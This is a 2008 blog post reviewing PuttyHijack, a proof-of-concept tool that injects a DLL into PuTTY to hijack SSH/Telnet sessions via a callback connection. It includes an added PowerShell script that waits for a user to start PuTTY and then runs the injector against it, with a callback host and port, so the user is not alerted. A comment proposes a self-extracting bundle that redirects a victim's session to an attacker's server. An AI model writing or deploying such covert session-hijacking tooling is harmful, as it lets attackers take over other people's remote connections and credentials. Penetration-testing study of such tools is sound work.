Monday, August 4, 2008

From the announcement: PuttyHijack is a POC tool that injects a DLL into the PuTTY process to hijack an existing, or soon-to-be-created, connection.

This can be useful during penetration tests when a Windows box that has been compromised is used to SSH/Telnet into other servers.

The injected DLL installs some hooks and creates a socket for a callback connection that is then used for input/output redirection.

It does not kill the current connection, and will cleanly uninject if the socket or process is stopped.

Works as described.

Issues:
* Only works if PuTTY is already running, otherwise it has nothing to hook. So in its current state it's cute but not usable.

Comments:
* What would be handy would be for the tool to run and wait for PuTTY to start, then do the hooking.
* The low-tech solution of just replacing the PuTTY link with a .bat file calling both putty.exe and PuttyHijack is thus far not working :-(
* Source is included, so realistically I should shut up and just fire up Visual Studio.
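The "run and wait for PuTTY to start, then hook" idea above can be done without touching the PuttyHijack source: a small launcher polls the process list, and only when a new putty.exe appears does it hand the PID to the injector. The script below is an added example written for this page; it is not part of PuttyHijack or the original post. The injector path and its command line (`<injector> <pid> <host> <port>`) are assumptions, as are the callback host and port, so check the PuttyHijack README/source for the real argument order before using it.

```powershell
# Added example (not PuttyHijack's own code): wait for a fresh putty.exe,
# then invoke an injector against its PID.
# ASSUMPTION: the injector's argument order below is hypothetical.
param(
    [string]$ProcessName  = 'putty',              # Get-Process name, no .exe
    [string]$Injector     = '.\PuttyHijack.exe',  # assumed path to the injector
    [string]$CallbackHost = '192.0.2.10',         # assumed listener (TEST-NET address)
    [int]   $CallbackPort = 4444,                 # assumed listener port
    [int]   $PollMs       = 500,                  # how often to check the process list
    [int]   $SettleMs     = 1000                  # let putty finish loading before injecting
)

function Wait-ForNewProcess {
    param([string]$Name, [int]$IntervalMs)

    # Snapshot PIDs that already exist so only a *newly launched* PuTTY
    # triggers injection; an already-running one would be targeted directly.
    $seen = @{}
    Get-Process -Name $Name -ErrorAction SilentlyContinue |
        ForEach-Object { $seen[$_.Id] = $true }

    while ($true) {
        $new = Get-Process -Name $Name -ErrorAction SilentlyContinue |
               Where-Object { -not $seen.ContainsKey($_.Id) }
        if ($new) { return ($new | Select-Object -First 1) }
        Start-Sleep -Milliseconds $IntervalMs
    }
}

$target = Wait-ForNewProcess -Name $ProcessName -IntervalMs $PollMs
Write-Host ("putty.exe started (PID {0}, started {1})" -f $target.Id, $target.StartTime)

# Give the process a moment to load its DLLs and create its window before
# the hooks go in; the announcement does not state how early injection is safe.
Start-Sleep -Milliseconds $SettleMs

if (-not (Test-Path $Injector)) {
    Write-Error "Injector not found at $Injector"
    exit 1
}

# Hypothetical invocation: <injector> <pid> <host> <port>
& $Injector $target.Id $CallbackHost $CallbackPort
Write-Host "Injector exit code: $LASTEXITCODE"
```

Run it in the background before the user is expected to open PuTTY; it exits after one injection, so wrap the call in a loop if several sessions are expected. Because the injector works on an existing PID, nothing is launched on the user's behalf and no unexpected PuTTY window appears.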

5 comments:

ChrisJohnRiley said...

I'm sure a short shell script would work to check the status of PuTTY and wait for it to be launched. That way you wouldn't alert the user/victim by kicking off a PuTTY session without them asking. You can just run the script, sit back and wait ;)

Couldn't you have a 7zip executable that is set to extract putty.exe, process.exe, the DLL and puttyhijack.exe, then run putty, process.exe (to get the PID), then call puttyhijack with the PID passed through and a redirect to the attacker's server?